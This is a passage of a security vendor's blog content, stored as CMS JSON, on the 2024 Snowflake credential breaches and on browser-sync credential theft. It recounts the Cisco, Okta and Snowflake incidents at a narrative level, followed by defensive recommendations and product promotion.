SQL-based reconnaissance, staging, and data exfiltration techniques, expedited by custom hacker tooling developed specifically for Snowflake, to conduct attacks at scale.",{"data":4267,"content":4268,"nodeType":254},{},[4269],{"data":4270,"content":4271,"nodeType":178},{},[4272],{"data":4273,"marks":4274,"value":4275,"nodeType":173},{},[],"ShinyHunters acquired massive quantities of Snowflake data based on the information that each customer stored in Snowflake or connected apps. ",{"data":4277,"content":4278,"nodeType":254},{},[4279],{"data":4280,"content":4281,"nodeType":178},{},[4282],{"data":4283,"marks":4284,"value":4285,"nodeType":173},{},[],"ShinyHunters began attempts to extort Snowflake and end-customers using the data acquired.",{"data":4287,"content":4291,"nodeType":312},{"target":4288},{"sys":4289},{"id":4290,"type":317,"linkType":318},"2J92gFLs1wAAGC4nQTaiWu",[],{"data":4293,"content":4294,"nodeType":231},{},[],{"data":4296,"content":4297,"nodeType":169},{},[4298],{"data":4299,"marks":4300,"value":4302,"nodeType":173},{},[4301],{"type":370},"Why did the Snowflake breaches happen?",{"data":4304,"content":4305,"nodeType":235},{},[4306],{"data":4307,"marks":4308,"value":4310,"nodeType":173},{},[4309],{"type":370},"Stolen credentials remained valid for years",{"data":4312,"content":4313,"nodeType":178},{},[4314],{"data":4315,"marks":4316,"value":4317,"nodeType":173},{},[],"The credentials used to access Snowflake accounts from historical infostealer infections had not been changed or rotated despite dating back as far as 2020, and remained valid. ",{"data":4319,"content":4320,"nodeType":178},{},[4321],{"data":4322,"marks":4323,"value":4324,"nodeType":173},{},[],"This highlights the potential risk of breached credentials already in the public domain, particularly in the case of cloud services like Snowflake that may not be subject to the same levels of credential hygiene as other traditional enterprise domain accounts. ",{"data":4326,"content":4327,"nodeType":235},{},[4328],{"data":4329,"marks":4330,"value":4332,"nodeType":173},{},[4331],{"type":370},"Local logins lacked MFA ",{"data":4334,"content":4335,"nodeType":178},{},[4336,4340,4348],{"data":4337,"marks":4338,"value":4339,"nodeType":173},{},[],"Even where organizations were primarily encouraging employees to use SSO to access their Snowflake tenant, previously created local logins with a username and password continue to exist even after introducing SSO-based logins. Further, MFA was not globally enforceable at the application level, meaning that MFA was only set when logging into an IdP account for SSO, but not for local logins. We call this problem ",{"data":4341,"content":4343,"nodeType":186},{"uri":4342},"https://pushsecurity.com/blog/ghost-logins-when-forgotten-identities-come-back-to-haunt-you/",[4344],{"data":4345,"marks":4346,"value":835,"nodeType":173},{},[4347],{"type":194},{"data":4349,"marks":4350,"value":197,"nodeType":173},{},[],{"data":4352,"content":4353,"nodeType":178},{},[4354],{"data":4355,"marks":4356,"value":4357,"nodeType":173},{},[],"This meant that attackers were able to take over Snowflake accounts with only a single authentication factor (username & password). ",{"data":4359,"content":4360,"nodeType":235},{},[4361],{"data":4362,"marks":4363,"value":4365,"nodeType":173},{},[4364],{"type":370},"Snowflake was a high-value target used by many organizations",{"data":4367,"content":4368,"nodeType":178},{},[4369],{"data":4370,"marks":4371,"value":4372,"nodeType":173},{},[],"As a data warehousing platform used by a vast number of organizations, Snowflake represented a high-value target based on the data typically stored within it, and the repeatable way in which Snowflake users could be targeted. ",{"data":4374,"content":4375,"nodeType":178},{},[4376],{"data":4377,"marks":4378,"value":4379,"nodeType":173},{},[],"The attacker followed a near identical process when targeting Snowflake victims, meaning it could be scripted and executed at scale, with attacks taking a matter of minutes. ",{"data":4381,"content":4382,"nodeType":235},{},[4383],{"data":4384,"marks":4385,"value":4387,"nodeType":173},{},[4386],{"type":370},"Infostealer infections are driving credential availability",{"data":4389,"content":4390,"nodeType":178},{},[4391],{"data":4392,"marks":4393,"value":4394,"nodeType":173},{},[],"Infostealers are often seen as a low-priority issue, but are the primary source of stolen credentials used in campaigns like this one. ",{"data":4396,"content":4397,"nodeType":178},{},[4398],{"data":4399,"marks":4400,"value":4401,"nodeType":173},{},[],"EDR is a strong protection but is often bypassed by infostealers as attackers continually modify them to bypass security controls. Further, unmanaged devices such as those used by third-party contractors or BYOD employees often lack the robust controls applied to company-managed devices and are naturally more susceptible to infostealer attacks. And since browser profiles can be synced across devices, even personal device compromises can result in the capture of corporate credentials.  ",{"data":4403,"content":4404,"nodeType":178},{},[4405,4409,4418],{"data":4406,"marks":4407,"value":4408,"nodeType":173},{},[],"There is some suggestion that targeting key third-party suppliers – ",{"data":4410,"content":4412,"nodeType":186},{"uri":4411},"https://www.wired.com/story/epam-snowflake-ticketmaster-breach-shinyhunters/",[4413],{"data":4414,"marks":4415,"value":4417,"nodeType":173},{},[4416],{"type":194},"such as EPAM Systems, a software engineering firm and Snowflake ‘Elite Tier Partner’",{"data":4419,"marks":4420,"value":4421,"nodeType":173},{},[]," – provided some of the access to Snowflake customers needed. It’s unclear what came first, but it’s possible (likely, even) that EPAM was identified as a target specifically because of its lucrative customer base and Snowflake credentials — adding another indicator that Snowflake was potentially a premeditated attack inspired by the availability of Snowflake credentials online.",{"data":4423,"content":4427,"nodeType":312},{"target":4424},{"sys":4425},{"id":4426,"type":317,"linkType":318},"4D0gjt5oJLNKJH8GzjP8Je",[],{"data":4429,"content":4430,"nodeType":231},{},[],{"data":4432,"content":4433,"nodeType":169},{},[4434],{"data":4435,"marks":4436,"value":4438,"nodeType":173},{},[4437],{"type":370},"Key takeaways from the Snowflake attacks",{"data":4440,"content":4441,"nodeType":235},{},[4442],{"data":4443,"marks":4444,"value":4446,"nodeType":173},{},[4445],{"type":370},"Securing your IdP accounts is not enough",{"data":4448,"content":4449,"nodeType":178},{},[4450],{"data":4451,"marks":4452,"value":4453,"nodeType":173},{},[],"SSO can help reduce your identity attack surface, but it's not feasible to get every workforce identity behind it.",{"data":4455,"content":4456,"nodeType":250},{},[4457,4480,4502,4537],{"data":4458,"content":4459,"nodeType":254},{},[4460],{"data":4461,"content":4462,"nodeType":178},{},[4463,4467,4476],{"data":4464,"marks":4465,"value":4466,"nodeType":173},{},[],"Only 1 in 3 apps support SAML SSO, and those that offer it often charge more for it; the “",{"data":4468,"content":4470,"nodeType":186},{"uri":4469},"https://ssotax.org/",[4471],{"data":4472,"marks":4473,"value":4475,"nodeType":173},{},[4474],{"type":194},"SSO tax",{"data":4477,"marks":4478,"value":4479,"nodeType":173},{},[],"”.",{"data":4481,"content":4482,"nodeType":254},{},[4483],{"data":4484,"content":4485,"nodeType":178},{},[4486,4490,4499],{"data":4487,"marks":4488,"value":4489,"nodeType":173},{},[],"Many apps are self-adopted by employees, leaving security teams unaware and unable to enforce SSO.  The typical organization has ",{"data":4491,"content":4493,"nodeType":186},{"uri":4492},"https://pushsecurity.com/blog/how-many-vulnerable-identities-do-you-have/",[4494],{"data":4495,"marks":4496,"value":4498,"nodeType":173},{},[4497],{"type":194},"hundreds of apps and thousands of unmanaged identities outside of SSO",{"data":4500,"marks":4501,"value":1477,"nodeType":173},{},[],{"data":4503,"content":4504,"nodeType":254},{},[4505],{"data":4506,"content":4507,"nodeType":178},{},[4508,4512,4520,4524,4533],{"data":4509,"marks":4510,"value":4511,"nodeType":173},{},[],"Most apps do not prevent users from creating additional \"",{"data":4513,"content":4514,"nodeType":186},{"uri":4342},[4515],{"data":4516,"marks":4517,"value":4519,"nodeType":173},{},[4518],{"type":194},"ghost login",{"data":4521,"marks":4522,"value":4523,"nodeType":173},{},[],"\" methods outside of SSO (especially by default), accounting for around ",{"data":4525,"content":4527,"nodeType":186},{"uri":4526},"https://pushsecurity.com/blog/how-many-vulnerable-identities-do-you-have/#id-identity-configurations-and-how-they-can-be-exploited_id-many-accounts-lack-the-most-basic-protections",[4528],{"data":4529,"marks":4530,"value":4532,"nodeType":173},{},[4531],{"type":194},"10% of all identities",{"data":4534,"marks":4535,"value":4536,"nodeType":173},{},[]," observed by Push. ",{"data":4538,"content":4539,"nodeType":254},{},[4540],{"data":4541,"content":4542,"nodeType":178},{},[4543,4547,4555],{"data":4544,"marks":4545,"value":4546,"nodeType":173},{},[],"In total, we identified that ",{"data":4548,"content":4549,"nodeType":186},{"uri":4492},[4550],{"data":4551,"marks":4552,"value":4554,"nodeType":173},{},[4553],{"type":194},"37% (2 in 5) accounts have a password login set with no MFA",{"data":4556,"marks":4557,"value":4558,"nodeType":173},{},[],", while 9% have no MFA AND a weak, breached, or reused password.",{"data":4560,"content":4561,"nodeType":178},{},[4562],{"data":4563,"marks":4564,"value":4565,"nodeType":173},{},[],"So, relying on locked-down IdP accounts and maximising the use of SSO is an important pillar of an effective identity security strategy, but there will always be gaps. Unless you recognize this, you may be blindsided by attackers finding them before you do. ",{"data":4567,"content":4568,"nodeType":235},{},[4569],{"data":4570,"marks":4571,"value":4573,"nodeType":173},{},[4572],{"type":370},"The threat of infostealers and stolen credentials needs to be taken seriously",{"data":4575,"content":4576,"nodeType":178},{},[4577],{"data":4578,"marks":4579,"value":4580,"nodeType":173},{},[],"Breached credentials appearing online is not always seen as a top priority for security teams, particularly when there’s so much noise from all of the outdated or simply erroneous findings (anyone that’s ever subscribed to a credential TI feed knows the pain of this). ",{"data":4582,"content":4583,"nodeType":178},{},[4584],{"data":4585,"marks":4586,"value":4587,"nodeType":173},{},[],"But Snowflake serves as a stark reminder that despite all the false positives, stolen credentials are sometimes valid — and when weaponized at-scale they can be a powerful tool for attackers. ",{"data":4589,"content":4593,"nodeType":312},{"target":4590},{"sys":4591},{"id":4592,"type":317,"linkType":318},"4EODpwKsqNivpvP2yMtZCd",[],{"data":4595,"content":4596,"nodeType":235},{},[4597],{"data":4598,"marks":4599,"value":4601,"nodeType":173},{},[4600],{"type":370},"Don’t rely on third-parties to protect your identities for you",{"data":4603,"content":4604,"nodeType":178},{},[4605],{"data":4606,"marks":4607,"value":4608,"nodeType":173},{},[],"Snowflake came under fire following the attacks for not enabling MFA by default, or giving security teams sufficient tools to deal with the incident. ",{"data":4610,"content":4611,"nodeType":178},{},[4612],{"data":4613,"marks":4614,"value":4615,"nodeType":173},{},[],"This is perhaps justifiable, but is hardly the exception. Very few apps enforce MFA by default or provide a global MFA enforcement mechanism. Most don’t even provide audit logs (and when they do, the scope of logging is pretty limited). And we regularly encounter apps that don’t give you any information about account configuration as an admin — like which accounts have MFA, or the login methods that they’re using (e.g. SSO via SAML, SSO via OIDC, password, which IdPs are being used…) which is essential information to be able to secure your identity attack surface. ",{"data":4617,"content":4618,"nodeType":178},{},[4619],{"data":4620,"marks":4621,"value":4622,"nodeType":173},{},[],"Yes, it would be great if app vendors put security first and made controls available by default, for all customers (not just the premium ones). But in the absence of an industrywide shift toward security-first product development, it’s important that organizations don’t just point the finger at service providers — and take matters into their own hands when it comes to securing their user identities. ",{"data":4624,"content":4625,"nodeType":235},{},[4626],{"data":4627,"marks":4628,"value":4630,"nodeType":173},{},[4629],{"type":370},"This isn’t a specific Snowflake problem — it could have been any application",{"data":4632,"content":4633,"nodeType":178},{},[4634],{"data":4635,"marks":4636,"value":4637,"nodeType":173},{},[],"While Snowflake was admittedly a high-value target because of the data it collected, apps with sensitive data (or with integrations connecting them to data collected in adjacent apps) are not in short supply. ",{"data":4639,"content":4640,"nodeType":178},{},[4641],{"data":4642,"marks":4643,"value":4644,"nodeType":173},{},[],"If we accept that many other apps are similarly desirable targets, then we should also consider that it’s unlikely that Snowflake is the only app that has valid credentials sitting around on the internet, waiting to be weaponized by criminals. Equally, it’s not the only app that doesn’t require mandatory MFA for user accounts, as we discussed above. The next Snowflake is likely to lurk in the same breached datasets, possibly even using the same credentials.",{"data":4646,"content":4647,"nodeType":178},{},[4648],{"data":4649,"marks":4650,"value":4651,"nodeType":173},{},[],"There’s been a clear increase in the number of infostealer and stolen credential related breaches and news stories since Snowflake as attackers wise up to the potential opportunity and start seeing the dollar signs. It would be naive to think that this was a one off event — the next Snowflake is probably not too far away. ",{"data":4653,"content":4654,"nodeType":178},{},[4655],{"data":4656,"marks":4657,"value":4658,"nodeType":173},{},[],"For a deep-dive analysis of the impact of Snowflake, check out our on-demand webinar from earlier this year.",{"data":4660,"content":4664,"nodeType":312},{"target":4661},{"sys":4662},{"id":4663,"type":317,"linkType":318},"7LkU5DqE9HJ1PQu9BTg6Mw",[],{"data":4666,"content":4667,"nodeType":231},{},[],{"data":4669,"content":4670,"nodeType":169},{},[4671],{"data":4672,"marks":4673,"value":4675,"nodeType":173},{},[4674],{"type":370},"How to protect yourself from the next Snowflake using Push",{"data":4677,"content":4678,"nodeType":178},{},[4679],{"data":4680,"marks":4681,"value":4682,"nodeType":173},{},[],"Organizations looking to reduce their exposure to account takeover using stolen credentials should look to:",{"data":4684,"content":4685,"nodeType":250},{},[4686,4696,4706],{"data":4687,"content":4688,"nodeType":254},{},[4689],{"data":4690,"content":4691,"nodeType":178},{},[4692],{"data":4693,"marks":4694,"value":4695,"nodeType":173},{},[],"Identify the apps being used across the business and locate vulnerable workforce identities using weak, breached, or reused credentials, and missing MFA. Where SSO is the preferred login method, local username & password logins should ideally be removed. ",{"data":4697,"content":4698,"nodeType":254},{},[4699],{"data":4700,"content":4701,"nodeType":178},{},[4702],{"data":4703,"marks":4704,"value":4705,"nodeType":173},{},[],"Where credentials appear in third-party data breaches, verify where they are still valid and ensure that the credentials are changed. ",{"data":4707,"content":4708,"nodeType":254},{},[4709],{"data":4710,"content":4711,"nodeType":178},{},[4712],{"data":4713,"marks":4714,"value":4715,"nodeType":173},{},[],"Detect unauthorized access to workforce identities where sessions are initiated or resumed from unusual or unexpected locations. It should be noted that while this is a fairly common feature for larger enterprise cloud platforms with configurable access control policies, this is not typically possible for most SaaS applications.  ",{"data":4717,"content":4718,"nodeType":178},{},[4719],{"data":4720,"marks":4721,"value":4722,"nodeType":173},{},[],"All of these use cases can be achieved using Push. The Push browser extension detects all logins performed in employee browsers, capturing granular information about the login method and MFA types used, and enriching this data by integrating with your preferred IdP.",{"data":4724,"content":4725,"nodeType":178},{},[4726,4730,4738],{"data":4727,"marks":4728,"value":4729,"nodeType":173},{},[],"Push’s ",{"data":4731,"content":4733,"nodeType":186},{"uri":4732},"https://pushsecurity.com/blog/verified-stolen-credential-detection",[4734],{"data":4735,"marks":4736,"value":4737,"nodeType":173},{},[],"verified stolen credential detection feature",{"data":4739,"marks":4740,"value":4741,"nodeType":173},{},[]," compares a k-anonymized hash of user passwords observed with stolen credential TI feeds to cut through the noise and identify where stolen credentials appearing online represent a genuine vulnerability.   ",{"data":4743,"content":4744,"nodeType":178},{},[4745,4749,4758],{"data":4746,"marks":4747,"value":4748,"nodeType":173},{},[],"On top of this, all logins made in browsers protected by the Push extension, across every app, are verified by ",{"data":4750,"content":4752,"nodeType":186},{"uri":4751},"https://pushsecurity.com/blog/introducing-session-token-theft-detection-why-browser-is-best/",[4753],{"data":4754,"marks":4755,"value":4757,"nodeType":173},{},[4756],{"type":194},"adding a unique marker to the user agent string of the session",{"data":4759,"marks":4760,"value":4761,"nodeType":173},{},[],", which will then appear in your IdP logs. This means that any session occurring outside of the Push-protected estate can be flagged to your security team via SIEM alert — including where an attacker uses stolen credentials to log into an app from a browser without the Push extension running. ",{"data":4763,"content":4767,"nodeType":312},{"target":4764},{"sys":4765},{"id":4766,"type":317,"linkType":318},"3tqVk7Vr7pYLOEVukIJM2g",[],{"data":4769,"content":4770,"nodeType":178},{},[4771],{"data":4772,"marks":4773,"value":37,"nodeType":173},{},[],"Snowflake: Looking back on 2024’s landmark security event","165 Snowflake customers were targeted by criminals using stolen credentials from infostealer infections, impacting hundreds of millions of people. ","2024-11-29T00:00:00.000Z","snowflake-retro",{"items":4779},[4780],{"sys":4781,"name":505},{"id":504},{"items":4783},[4784],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":4785},{"url":1496},{"items":4787},[4788],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":4789},{"url":1496},{"json":4791,"links":5304},{"nodeType":165,"data":4792,"content":4793},{},[4794,4813,4829,4835,4847,4854,4857,4865,4872,4879,4900,4912,4918,4930,4942,4948,4955,4962,4965,4973,4981,5013,5020,5027,5035,5055,5062,5069,5076,5083,5091,5109,5116,5123,5130,5137,5140,5148,5155,5161,5168,5171,5178,5185,5192,5198,5205,5211,5218,5224,5231,5237,5243,5249,5252,5260,5267],{"nodeType":178,"data":4795,"content":4796},{},[4797,4801,4810],{"nodeType":173,"value":4798,"marks":4799,"data":4800},"One of the breakaway stories of 2026 has been the rise in attacks powered by ",[],{},{"nodeType":186,"data":4802,"content":4804},{"uri":4803},"https://pushsecurity.com/blog/browser-extension-management-guide/",[4805],{"nodeType":173,"value":4806,"marks":4807,"data":4809},"malicious browser extensions",[4808],{"type":194},{},{"nodeType":173,"value":197,"marks":4811,"data":4812},[],{},{"nodeType":178,"data":4814,"content":4815},{},[4816,4820,4825],{"nodeType":173,"value":4817,"marks":4818,"data":4819},"Most browser extension attacks are really targeting the apps your users are accessing ",[],{},{"nodeType":173,"value":4821,"marks":4822,"data":4824},"inside",[4823],{"type":1646},{},{"nodeType":173,"value":4826,"marks":4827,"data":4828}," the browser. They do this by intercepting credentials (passwords, session cookies, and so on) as you browse the internet. ",[],{},{"nodeType":312,"data":4830,"content":4834},{"target":4831},{"sys":4832},{"id":4833,"type":317,"linkType":318},"1nUMc1L69zkD3MmmdqbYm0",[],{"nodeType":178,"data":4836,"content":4837},{},[4838,4843],{"nodeType":173,"value":4839,"marks":4840,"data":4842},"But there’s an often overlooked vector that leads to the same outcome — synced browser profiles. ",[4841],{"type":370},{},{"nodeType":173,"value":4844,"marks":4845,"data":4846},"And the most dangerous part of this attack is that it often stems from personal device compromises — naturally, outside the scope of your corporate security software. ",[],{},{"nodeType":178,"data":4848,"content":4849},{},[4850],{"nodeType":173,"value":4851,"marks":4852,"data":4853},"Sign into Chrome or Edge with a Google or Microsoft account, and your passwords, bookmarks, history, and extensions follow you seamlessly across every device. For individual users, it's a quality-of-life improvement. But for organisations, it links corporate accounts to personal ones with far weaker security controls. ",[],{},{"nodeType":231,"data":4855,"content":4856},{},[],{"nodeType":169,"data":4858,"content":4859},{},[4860],{"nodeType":173,"value":4861,"marks":4862,"data":4864},"How browser sync attacks work",[4863],{"type":370},{},{"nodeType":178,"data":4866,"content":4867},{},[4868],{"nodeType":173,"value":4869,"marks":4870,"data":4871},"When an employee signs into a personal browser profile on a work device (or saves work credentials on a personal device), the browser's sync mechanism copies those credentials into a cloud account outside the organisation's control. That cloud account — typically a personal Google or Microsoft account — becomes the weakest link in the chain.",[],{},{"nodeType":178,"data":4873,"content":4874},{},[4875],{"nodeType":173,"value":4876,"marks":4877,"data":4878},"The typical sequence looks like this:",[],{},{"nodeType":178,"data":4880,"content":4881},{},[4882,4887,4891,4896],{"nodeType":173,"value":4883,"marks":4884,"data":4886},"An employee signs into Chrome with their personal Google account on a corporate laptop. ",[4885],{"type":370},{},{"nodeType":173,"value":4888,"marks":4889,"data":4890},"During the course of their work, the browser prompts them to save passwords — for a VPN, an internal tool, a support system, a cloud platform. They click \"Save.\" The credential is now stored locally in the browser ",[],{},{"nodeType":173,"value":4892,"marks":4893,"data":4895},"and",[4894],{"type":1646},{},{"nodeType":173,"value":4897,"marks":4898,"data":4899}," synced to their personal Google account in the cloud.",[],{},{"nodeType":178,"data":4901,"content":4902},{},[4903,4908],{"nodeType":173,"value":4904,"marks":4905,"data":4907},"The personal account is compromised. ",[4906],{"type":370},{},{"nodeType":173,"value":4909,"marks":4910,"data":4911},"This can happen in a lot of ways, and is made easier by the less secure nature of personal accounts. They are typically accessed from devices with less or no security protection, while MFA and other identity-layer controls are less common. Once the personal device or account is breached, every synced password — including corporate ones — is in the hands of the attacker. ",[],{},{"nodeType":312,"data":4913,"content":4917},{"target":4914},{"sys":4915},{"id":4916,"type":317,"linkType":318},"2GQ4TVJQWS9VJB5W6fBeLS",[],{"nodeType":178,"data":4919,"content":4920},{},[4921,4926],{"nodeType":173,"value":4922,"marks":4923,"data":4925},"With the harvested corporate credentials, the attacker authenticates to the organisation's systems.",[4924],{"type":370},{},{"nodeType":173,"value":4927,"marks":4928,"data":4929}," If MFA is absent or bypassable (via fatigue attacks, social engineering, or session token reuse), they're in.",[],{},{"nodeType":178,"data":4931,"content":4932},{},[4933,4938],{"nodeType":173,"value":4934,"marks":4935,"data":4937},"From here, it's a conventional intrusion — privilege escalation, reconnaissance, and exfiltration. ",[4936],{"type":370},{},{"nodeType":173,"value":4939,"marks":4940,"data":4941},"But the initial access was entirely outside the defender's visibility. No phishing email hit the corporate mail gateway. No exploit was fired at a corporate asset. The compromise happened in a personal context that security teams had no control over.",[],{},{"nodeType":312,"data":4943,"content":4947},{"target":4944},{"sys":4945},{"id":4946,"type":317,"linkType":318},"5llxwUFxBOjuXTyr5LXOyy",[],{"nodeType":178,"data":4949,"content":4950},{},[4951],{"nodeType":173,"value":4952,"marks":4953,"data":4954},"What makes this attack so effective is that it entirely bypasses the corporate security stack. Endpoint detection, email filtering, network monitoring — none of it sees the initial compromise because it happens on a personal device or in a personal cloud account.",[],{},{"nodeType":178,"data":4956,"content":4957},{},[4958],{"nodeType":173,"value":4959,"marks":4960,"data":4961},"The scope isn’t limited to “personal” devices either. BYOD and contractor machines suffer from the same security limitations in that they are a place where personal and corporate use converges, and/or they sit outside of the scope of your security tooling. ",[],{},{"nodeType":231,"data":4963,"content":4964},{},[],{"nodeType":169,"data":4966,"content":4967},{},[4968],{"nodeType":173,"value":4969,"marks":4970,"data":4972},"Real-world incidents",[4971],{"type":370},{},{"nodeType":235,"data":4974,"content":4975},{},[4976],{"nodeType":173,"value":4977,"marks":4978,"data":4980},"Cisco (2022)",[4979],{"type":370},{},{"nodeType":178,"data":4982,"content":4983},{},[4984,4987,4996,5000,5009],{"nodeType":173,"value":37,"marks":4985,"data":4986},[],{},{"nodeType":186,"data":4988,"content":4990},{"uri":4989},"https://thehackernews.com/2022/08/cisco-confirms-its-been-hacked-by.html",[4991],{"nodeType":173,"value":4992,"marks":4993,"data":4995},"Cisco",[4994],{"type":194},{},{"nodeType":173,"value":4997,"marks":4998,"data":4999}," was breached by an initial access broker with ties to the Yanluowang ransomware group, UNC2447, and the ",[],{},{"nodeType":186,"data":5001,"content":5003},{"uri":5002},"https://pushsecurity.com/blog/scattered-lapsus-hunters/",[5004],{"nodeType":173,"value":5005,"marks":5006,"data":5008},"Lapsus$",[5007],{"type":194},{},{"nodeType":173,"value":5010,"marks":5011,"data":5012}," threat actor group. ",[],{},{"nodeType":178,"data":5014,"content":5015},{},[5016],{"nodeType":173,"value":5017,"marks":5018,"data":5019},"A Cisco employee had enabled Chrome's password syncing feature and had stored their Cisco VPN credentials in the browser. Those credentials were synchronised to their personal Google account. The attacker compromised the personal Google account, obtained the VPN credentials, and then used a combination of voice phishing and MFA fatigue — repeatedly sending push notifications until the employee accepted one — to bypass multi-factor authentication and gain VPN access.",[],{},{"nodeType":178,"data":5021,"content":5022},{},[5023],{"nodeType":173,"value":5024,"marks":5025,"data":5026},"Once inside the network, the attacker escalated privileges, moved laterally to Citrix servers and domain controllers, and deployed offensive tooling consistent with pre-ransomware activity. Cisco's security team ultimately detected and removed the attacker before ransomware was deployed, but the adversary made repeated attempts to regain access in the following weeks, including targeting accounts where employees had only made single-character password changes after the company-wide reset.",[],{},{"nodeType":235,"data":5028,"content":5029},{},[5030],{"nodeType":173,"value":5031,"marks":5032,"data":5034},"Okta (2023)",[5033],{"type":370},{},{"nodeType":178,"data":5036,"content":5037},{},[5038,5042,5051],{"nodeType":173,"value":5039,"marks":5040,"data":5041},"The ",[],{},{"nodeType":186,"data":5043,"content":5045},{"uri":5044},"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause/",[5046],{"nodeType":173,"value":5047,"marks":5048,"data":5050},"Okta breach",[5049],{"type":194},{},{"nodeType":173,"value":5052,"marks":5053,"data":5054}," followed an almost identical pattern to Cisco, but with more severe downstream consequences.",[],{},{"nodeType":178,"data":5056,"content":5057},{},[5058],{"nodeType":173,"value":5059,"marks":5060,"data":5061},"Between September 28 and October 17, 2023, an attacker gained unauthorised access to Okta's customer support case management system. The root cause: an Okta employee had signed into their personal Google profile on Chrome on their Okta-managed laptop. While signed into that personal profile, they accessed a service account for the support system. The service account's username and password were saved by Chrome and synced to the employee's personal Google account.",[],{},{"nodeType":178,"data":5063,"content":5064},{},[5065],{"nodeType":173,"value":5066,"marks":5067,"data":5068},"The attacker — having compromised either the personal Google account or a personal device — obtained these service account credentials and used them to access the support system. The compromised service account had permissions to view and update customer support cases, which contained HAR (HTTP Archive) files uploaded by customers for troubleshooting. Some of these HAR files contained session tokens.",[],{},{"nodeType":178,"data":5070,"content":5071},{},[5072],{"nodeType":173,"value":5073,"marks":5074,"data":5075},"The attacker used the stolen session tokens to hijack the legitimate Okta sessions of five customers, including 1Password, BeyondTrust, and Cloudflare — three security companies that independently detected the suspicious activity and reported it to Okta. In total, files associated with 134 Okta customers were accessed.",[],{},{"nodeType":178,"data":5077,"content":5078},{},[5079],{"nodeType":173,"value":5080,"marks":5081,"data":5082},"What made this breach particularly notable was the detection gap. Okta's security team was unable to identify suspicious file downloads in their logs for 14 days. The attacker navigated directly to the Files tab in the support system rather than opening files through individual support cases, which generated a different log event type that wasn't part of the initial investigation scope. It wasn't until BeyondTrust provided a suspicious IP address on October 13 that Okta was able to correlate the activity.",[],{},{"nodeType":235,"data":5084,"content":5085},{},[5086],{"nodeType":173,"value":5087,"marks":5088,"data":5090},"Snowflake (customers) (2024)",[5089],{"type":370},{},{"nodeType":178,"data":5092,"content":5093},{},[5094,5097,5105],{"nodeType":173,"value":5039,"marks":5095,"data":5096},[],{},{"nodeType":186,"data":5098,"content":5099},{"uri":819},[5100],{"nodeType":173,"value":5101,"marks":5102,"data":5104},"Snowflake campaign",[5103],{"type":194},{},{"nodeType":173,"value":5106,"marks":5107,"data":5108}," represents what happens when the browser-credential-sync problem meets infostealer malware at scale. ",[],{},{"nodeType":178,"data":5110,"content":5111},{},[5112],{"nodeType":173,"value":5113,"marks":5114,"data":5115},"In 2024, a financially motivated threat actor tracked as UNC5537 (associated with the ShinyHunters group) systematically compromised approximately 165 Snowflake customer environments. The attackers didn't exploit any vulnerability in Snowflake itself. They logged in with valid credentials.",[],{},{"nodeType":178,"data":5117,"content":5118},{},[5119],{"nodeType":173,"value":5120,"marks":5121,"data":5122},"Those credentials had been harvested by infostealer malware — including Vidar, RedLine, Lumma, RisePro, Raccoon Stealer, and MetaStealer — from employee and contractor devices over a period stretching back to 2020. Mandiant's investigation found that over 80% of the compromised accounts had prior credential exposure, and critically, the stolen credentials had never been rotated.",[],{},{"nodeType":178,"data":5124,"content":5125},{},[5126],{"nodeType":173,"value":5127,"marks":5128,"data":5129},"The personal/corporate boundary failure was central to the campaign. Mandiant specifically noted that in several cases, the initial infostealer infections occurred on contractor systems that were also used for personal activities, including gaming and downloads of pirated software. These were personal or unmonitored laptops where corporate credentials had been saved in the browser alongside everything else.",[],{},{"nodeType":178,"data":5131,"content":5132},{},[5133],{"nodeType":173,"value":5134,"marks":5135,"data":5136},"The impacted Snowflake accounts lacked MFA (which Snowflake did not enforce by default at the time), and the attackers used a custom tool to automate SQL-based reconnaissance and data exfiltration across customer instances. The stolen data encompassed hundreds of millions of customer records, and at least one victim paid an undisclosed ransom.",[],{},{"nodeType":231,"data":5138,"content":5139},{},[],{"nodeType":169,"data":5141,"content":5142},{},[5143],{"nodeType":173,"value":5144,"marks":5145,"data":5147},"What security teams can do about it",[5146],{"type":370},{},{"nodeType":178,"data":5149,"content":5150},{},[5151],{"nodeType":173,"value":5152,"marks":5153,"data":5154},"Chrome Enterprise and Microsoft Edge for Business both support policies that prevent employees from signing into personal accounts on corporate-managed browsers. This is the most direct control. It doesn't prevent all credential leakage scenarios, but it closes the sync-to-personal-cloud path.",[],{},{"nodeType":312,"data":5156,"content":5160},{"target":5157},{"sys":5158},{"id":5159,"type":317,"linkType":318},"CmrOdYVVW6wz9kdRqxOmX",[],{"nodeType":178,"data":5162,"content":5163},{},[5164],{"nodeType":173,"value":5165,"marks":5166,"data":5167},"Every incident described above was enabled or worsened by the absence of MFA on the target system. MFA should be mandatory for all human user accounts, and organisations should audit for \"ghost logins\" — local username/password accounts that persist alongside SSO and bypass its MFA enforcement.",[],{},{"nodeType":231,"data":5169,"content":5170},{},[],{"nodeType":169,"data":5172,"content":5173},{},[5174],{"nodeType":173,"value":1422,"marks":5175,"data":5177},[5176],{"type":370},{},{"nodeType":178,"data":5179,"content":5180},{},[5181],{"nodeType":173,"value":5182,"marks":5183,"data":5184},"Push makes browser security easier than ever, particularly when dealing with complex environments running different browsers and operating systems. ",[],{},{"nodeType":178,"data":5186,"content":5187},{},[5188],{"nodeType":173,"value":5189,"marks":5190,"data":5191},"You can use Push to surface which users are logged into their browser using a non-work profile and whether the profile is synced across devices. Push captures this information for every browser that your employees are using, including Chrome, Edge, Firefox, Safari, Brave, Opera, Arc, Island, and Prisma (and we’re always adding support for new ones). ",[],{},{"nodeType":312,"data":5193,"content":5197},{"target":5194},{"sys":5195},{"id":5196,"type":317,"linkType":318},"67sSoSW136TeBZzYIEXggP",[],{"nodeType":178,"data":5199,"content":5200},{},[5201],{"nodeType":173,"value":5202,"marks":5203,"data":5204},"Sync attacks can impact both saved credentials and browser extensions. This means that even if your employees aren’t saving credentials to their browser profile, you can still be at risk if they’ve installed any extensions in another browser where they’re signed in. ",[],{},{"nodeType":312,"data":5206,"content":5210},{"target":5207},{"sys":5208},{"id":5209,"type":317,"linkType":318},"1MzuYaPlUpYfTnBJRqUBtO",[],{"nodeType":178,"data":5212,"content":5213},{},[5214],{"nodeType":173,"value":5215,"marks":5216,"data":5217},"You can use Push to identify where credentials are being saved — for example, are employees using your company-approved password manager, or copying credentials from unsanctioned apps or locations? This includes where users are manually copying passwords from a password manager app rather than auto-populating (this increases the chance of them entering these passwords into phishing 